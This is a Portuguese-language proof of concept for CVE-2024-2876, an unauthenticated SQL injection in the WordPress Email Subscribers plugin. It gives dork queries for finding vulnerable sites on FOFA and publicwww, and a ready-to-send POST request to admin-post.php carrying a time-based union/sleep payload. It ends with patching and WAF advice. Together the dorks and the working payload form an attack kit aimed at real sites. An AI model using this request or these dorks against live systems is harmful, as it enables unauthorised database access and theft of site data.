
Prova de conceito para CVE-2024-2876, uma injeção SQL não autenticada no plugin WordPress Email Subscribers, com consultas dork e uma requisição de exploit funcional.
#Descrição Da Vulnerabilidade: O plugin Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce para WordPress é vulnerável a SQL Injection através da função 'run' da classe 'IG_ES_Subscribers_Query' em todas as versões até, e incluindo, a 5.7.14 devido a escape insuficiente no parâmetro fornecido pelo usuário e falta de preparação suficiente na consulta SQL existente. Isso possibilita que atacantes não autenticados anexem consultas SQL adicionais em consultas já existentes que podem ser usadas para extrair informações sensíveis do banco de dados.
#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"
#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE
#Como corrigir ? Como todas as versões até a 5.7.14 foram detectadas com a CVE, recomenda-se que os usuários atualizem o plugin Email Subscribers by Icegram Express para a versão 5.7.15 (ou a versão mais recente 5.7.19). Os usuários do Patchstack têm a opção de habilitar atualizações automáticas especificamente para plugins vulneráveis. Implemente uma solução WAF/WAAP como uma camada adicional de proteção. A vantagem de tais soluções é que, mesmo que a vulnerabilidade seja nova e desconhecida (0-day), ela ainda pode prevenir ataques detectando padrões e técnicas de exploração.